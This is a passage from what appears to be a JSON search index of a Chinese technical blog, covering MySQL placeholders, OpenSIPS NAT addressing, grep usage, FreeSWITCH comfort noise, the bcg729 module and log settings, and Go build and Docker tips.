RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail.","title":"Linux内核参数rp_filter"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n但当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. 
Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared语句的文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder。 https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/posts/2022/06/vvdqw6/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n但当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared语句的文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder。 https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见公有云提供的云服务器,一般都有一个内网地址如192.168.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广告地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广告地址应该是OUTER_IP, 所以对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 
这样的情况下,从内网发送到公网的请求,携带的Via就会被设置成1.2.3.4。\n但是as设置的广告地址也不一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch9/nat-single-interface/","summary":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见公有云提供的云服务器,一般都有一个内网地址如192.168.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广告地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广告地址应该是OUTER_IP, 所以对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 这样的情况下,从内网发送到公网的请求,携带的Via就会被设置成1.2.3.4。\n但是as设置的广告地址也不一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","title":"NAT场景下的信令处理 - 单网卡"},{"content":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及行号。 -m:匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出到文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 
上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 多字段:搜索包含ERROR和DEBUG字段的日志 grep -E \u0026#39;ERROR|DEBUG\u0026#39; trace.log 9. 多文件:从多个.log文件中搜索含有ERROR的日志 grep ERROR *.log 10. 省略文件名:从多个.log文件中搜索ERROR字段日志,并不显示日志文件名 从多个文件中搜索的日志默认每行会带有日志文件名\ngrep -h ERROR *.log 11. 时间范围: 按照时间范围搜索日志 awk \u0026#39;$2\u0026gt;\u0026#34;17:30:00\u0026#34; \u0026amp;\u0026amp; $2\u0026lt;\u0026#34;18:00:00\u0026#34;\u0026#39; trace.log 日志形式如下, $2代表第二列即16:44:58, awk需要指定列\n11-21 16:44:58 /user/info/\n12. 有没有:搜索到第一个匹配行后就停止搜索 grep -m 1 ERROR trace.log 13. 使用正则提取字符串 grep -Eo \u0026#39;cause\u0026#34;:\u0026#34;(.*?)\u0026#34;\u0026#39; test.log cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;B\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; 如果想对提取字符串的结果按照出现的次数进行排序,可以使用sort, uniq命令 grep -Eo \u0026lsquo;cause\u0026quot;:\u0026quot;(.*?)\u0026quot;\u0026rsquo; test.log | sort | uniq -c | sort -k1,1 -n\n步骤分解\nsort 对结果进行排序 uniq -c 对结果进行去重并统计出现次数 sort -k1,1 -n 按照第一列的结果,进行数值大小排序 ","permalink":"https://wdd.js.org/shell/grep-docs/","summary":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及行号。 -m:匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出到文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 
多字段:搜索包含ERROR和DEBUG字段的日志 grep -E \u0026#39;ERROR|DEBUG\u0026#39; trace.","title":"grep常用参考"},{"content":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide 
https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","title":"Shell 书籍和资料收藏"},{"content":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | ... 
| NM | +-----+-----+-----+-----+-----+ Figure 2: CN Payload Packing Format 在SIP INVITE的SDP中也可以看到编码,如下面的CN\nm=audio 20000 RTP/AVP 8 111 63 103 104 9 0 106 105 13 110 112 113 126 a=rtpmap:106 CN/32000 a=rtpmap:105 CN/16000 a=rtpmap:13 CN/8000 当VAD函数检测到没有人声时,就会发送舒适噪音。通常来说,只有当环境噪音发生变化的时候,才需要发送CN包。接收方在收到新的CN包后,会更新产生舒适噪音的参数。\n比如下图是sngrep抓包关于webrtc的呼叫时,就能看到浏览器送到SIP Server的CN包。\n│ \u0026lt;────────────────────────────────────────────────── RTP (g711a) 130 ───────────────────── │ ──────────────────────────────────── RTP (g711a) 130 ─────────────────────────────────\u0026gt; │ │ ────────────────────────────────────────────────── RTP (g711a) 1168 ───────────────────── │ \u0026lt;\u0026lt;\u0026lt;──── 200 OK (SDP) ────── │ │ │ │ ────────────────────── 200 OK (SDP) ──────────────────\u0026gt;\u0026gt;\u0026gt; │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────────────────────── ACK ───────────────────────── │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────── INFO ────────── │ │ │ │ ────────────────────────── INFO ────────────────────────\u0026gt; │ │ │ \u0026lt;──────────────────────── 200 OK ──────────────────────── │ │ │ ────────── 200 OK ────────\u0026gt; │ │ │ │ \u0026lt;─────────────────────────────────────────────────── RTP (cn) 208 ─────────────────────── │ ───────────────────────────────────── RTP (cn) 208 ───────────────────────────────────\u0026gt; │ │ \u0026lt;────────────────────────── BYE ───────────────────────── │ │ FreeSWITCH WebRTC 录音质量差 FreeSWITCH bridge两个call leg, 一侧是WebRTC一侧是普通SIP终端,在录音的时候发现录音卡顿基本没办法听,但是双发通话的语音是正常的。\n最终发现录音质量差和舒适噪音有关。\n方案1: 全局抑制舒适噪音\n\u0026lt;!-- Video Settings --\u0026gt; \u0026lt;!-- Setting the max bandwdith --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_in=3mb\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_out=3mb\u0026#34;/\u0026gt; \u0026lt;!-- WebRTC Video --\u0026gt; \u0026lt;!-- 
Suppress CNG for WebRTC Audio --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;suppress_cng=true\u0026#34;/\u0026gt; \u0026lt;!-- Enable liberal DTMF for those that can\u0026#39;t get it right --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_liberal_dtmf=true\u0026#34;/\u0026gt; \u0026lt;!-- Helps with WebRTC Audio --\u0026gt; \u0026lt;!-- Stock Video Avatars --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_mute_png=$${images_dir}/default-mute.png\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_no_avatar_png=$${images_dir}/default-avatar.png\u0026#34;/\u0026gt; 方案2: 在Bleg抑制舒适噪音\n\u0026lt;action application=\u0026#34;set\u0026#34; data=\u0026#34;bridge_generate_comfort_noise=true\u0026#34;/\u0026gt; \u0026lt;action application=\u0026#34;bridge\u0026#34; data=\u0026#34;sofia/user/1000\u0026#34;/\u0026gt; 参考 https://freeswitch.org/confluence/display/FREESWITCH/VAD+and+CNG https://www.rfc-editor.org/rfc/rfc3389 https://www.rfc-editor.org/rfc/rfc1890 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files#SofiaConfigurationFiles-suppress-cng https://freeswitch.org/confluence/display/FREESWITCH/bridge_generate_comfort_noise ","permalink":"https://wdd.js.org/freeswitch/webrtc-vad-cng/","summary":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 
也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | .","title":"WebRTC 人声检测与舒适噪音"},{"content":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... } Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation. https://golang.google.cn/cmd/go/#hdr-Build_modes https://www.digitalocean.com/community/tutorials/using-ldflags-to-set-version-information-for-go-applications ","permalink":"https://wdd.js.org/golang/inject-version/","summary":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... 
} Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation.","title":"在二进制文件中注入版本信息"},{"content":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . # 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","permalink":"https://wdd.js.org/golang/scratch-dockerfile/","summary":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . 
# 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","title":"Golang Dockerfile"},{"content":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。\n","permalink":"https://wdd.js.org/posts/2022/05/hugo-blog-faq/","summary":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。","title":"Hugo博客常见问题以及解决方案"},{"content":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g729模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编译的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mod_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编译mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 
头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step6: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step7: sip profile修改 开启转码\n\u0026lt;param name=\u0026#34;disable-transcoding\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; 然后重启fs, 进入到fs_cli中,输入: show codec, 看看有没有显示729编码。然后就是找话机,测试g729编码了。\n","permalink":"https://wdd.js.org/freeswitch/install-bcg729/","summary":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g729模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编译的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mod_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编译mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 
头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESScmd=\u0026#34;set\u0026#34;data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码","title":"安装bcg729模块"},{"content":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. 
bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档\nhttps://txlab.wordpress.com/2012/09/17/setting-up-a-conference-bridge-with-freeswitch/ https://freeswitch.org/confluence/display/FREESWITCH/mod_conference ","permalink":"https://wdd.js.org/freeswitch/conference-announce/","summary":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. 
bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档","title":"会议提示音无法正常播放"},{"content":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","permalink":"https://wdd.js.org/freeswitch/log-settings/","summary":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 